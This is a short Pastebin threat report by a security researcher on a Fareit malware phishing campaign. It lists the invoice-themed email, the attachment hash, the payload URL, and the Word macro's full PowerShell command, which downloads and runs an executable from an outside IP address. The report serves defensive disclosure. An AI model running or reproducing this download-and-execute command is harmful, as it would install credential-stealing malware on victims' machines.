Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Packed.Win32.Fareit VBA Macro
- Reported by neonprimetime security
- http://neonprimetime.blogspot.com
- *****
- Blog about this: http://neonprimetime.blogspot.com/2015/03/talking-thru-some-malware-in-microsoft.html
- *****
- Malicious Email
- From: Forrest Chavez <Carmella.7b@lepau.com>
- Subject: Outstanding invoices - 122680 January
- Attachment: 122680.doc , MD5 Checksum cbfb453c2c43951ecbefc4eb6c20fb7f
- *****
- Payload
- hxxp://62.76.41.15/asalt/assa.exe
- Packed.Win32.Fareit.1!O
- ******
- Microsoft Word VBA Macro
- "cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://62.76.41.15/asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement